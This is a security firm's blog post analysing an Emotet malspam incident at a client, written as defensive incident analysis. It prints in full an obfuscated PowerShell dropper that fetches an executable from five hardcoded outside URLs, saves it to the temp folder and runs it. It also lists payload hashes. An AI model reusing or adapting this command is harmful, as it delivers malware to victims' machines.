skip to Main Content
Blog – Detecting Emotet Malspam

Blog – Detecting Emotet Malspam

Introduction to Emotet Malspam

Recently, one of Cyberseer’s clients was hit with a “Malspam” campaign aiming to plant the Emotet malware within its network. The original e-mail was sent to a distribution group which quickly escalated the situation. As this was a new campaign for that day, the client’s e-mail gateway had no matching signatures and allowed the malicious e-mail to end up in a number of users’ inboxes.

What is Emotet?

Emotet accounted for 57% of all banking trojan payloads in Q1 2018 [1] with a steady number of infections and daily new campaigns throughout the year. First reported in 2014 as a banking trojan, Emotet has evolved into a malware delivery botnet that takes advantage of social engineering techniques to compromise a machine. Infection usually begins with a user being sent a phishing e-mail containing a malicious Word document or a link to a malicious URL. Upon opening the malicious document, a combination of obfuscated VBA scripts / macros instructs the target machine to download a remote payload consisting of a number of different modules.Figure 1 - Emotet Activity

Figure 1 – Emotet Activity [2]

Previously downloaded payloads have included:

  • Banking infostealer – Intercepts network traffic from the browser to steal banking details entered by the user.
  • Email client infostealer – Steals e-mail credentials from email client software.
  • Browser infostealer – Steals information stored in browsers such as browsing history and saved passwords.
  • PST infostealer – Reads through Outlook’s message archives and extracts the sender names and e-mail addresses of the messages.

Detection of EmotetFigure 2 Emotet Infection Chain

Figure 2 – Emotet Infection Chain [3]

With the first stage of the attack involving an e-mail attachment, it makes sense to start off by analysing the Word document that landed in the victim’s inboxes.

As stated in the previous section, when a user opens the document and enables macros a VBA scrip runs, we then see the following Powershell command being run to pull files from remote locations:

 

powershell.exe powershell $fbq=’IkL’;$qdr=‘http://danzarspiritandtruth.com/J7B5TiAIp@http://littlepeonyphotos.ru/jPGDyvIm@http://iuyouth.hcmiu.edu.vn/mVayv0I7S@http://exploraverde.co/mmR4TaGu8@http://turkaline.com/zGiFH0X‘.Split(‘@’);$siF=([System.IO.Path]::GetTempPath()+’\zEl.exe’);$wjS =New-Object -com ‘msxml2.xmlhttp’;$TMS = New-Object -com ‘adodb.stream’;foreach($PJC in $qdr){try{$wjS.open(‘GET’,$PJC,0);$wjS.send();$TMS.open();$TMS.type = 1;$TMS.write($wjS.responseBody);$TMS.savetofile($siF);Start-Process $siF;break}catch{}}

 

The command contains 5 hardcoded URLs serving a number of different payloads. Connections to these URLs is how the incident was first identified by Cyberseer analysts. As soon as the URL was connected to, signatureless models first breached for connections to the domains and then the download of the payload. Taking a step back, these external connections were 100% anomalous for this network environment

Figure 3 - Initial Connections

Figure 3 – Initial connections

Pivoting into the network logs, a quick investigation of the external domains reveals 5 users had become a victim of this attack –

Figure 4 - Devices Associated

Figure 4 – Devices associated

Drilling deeper into the connections from one of the associated devices and looking at a PCAP we can confirm the download of the malicious payloads:Figure 5 - Executable seen in PCAP

Figure 5 – Executable seen in PCAP

Carving the payloads from the PCAP we get the following exe files –

 

dd975e74625cdd2959005dc9043f4c26

https://www.virustotal.com/#/file/44504663abd7b411dbd53a5175e71643acac03d85acb0d1c366819925d4aca97/detection

 

9a2c288270459e95d915b8eaee7f65da

https://www.virustotal.com/#/file/e426afe7129b3e68256b57e62a6e4b76f89a3d7726fba2a99752fce7b8acafad/detection

Cyberseer Analysts were able to rapidly investigate the file and contact the client. Luckily the downloaded executables were unable to execute due to permissions, allowing for them to be successfully quarantined and remediated before a further compromise could occur.

Conclusion

This scenario highlights how traditional signature-based approaches are not enough to adequately defend a network against constantly evolving, new unknown threats. A machine-learnt behavioural approach to security is able to detect threats ahead of other traditional solutions, allowing a faster response to potential breaches. Security technologies that require signatures and blacklists to be updated will always be one step behind the attackers and never be able to detect new unknown threats in real-time.

Cyberseer’s threat detection and analysis managed security service bridges the gaps in an organisations cyber defence system. Having the ability to detect and understand the severity of internal and external threats provides effective threat mitigation. Understanding your organisation’s threat score and dealing with live issues early, decreases incident response times and significantly reduces the risk of cyber damage.

 

 

Sources: [1] – https://www.proofpoint.com/sites/default/files/pfpt-us-tr-q118-quarterly-threat-report.pdf; [2] – https://blog.malwarebytes.com/cybercrime/2018/09/emotet-rise-heavy-spam-campaign/; [3] – http://www.malware-traffic-analysis.net/2018/11/16/index.html

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

×Close search
Search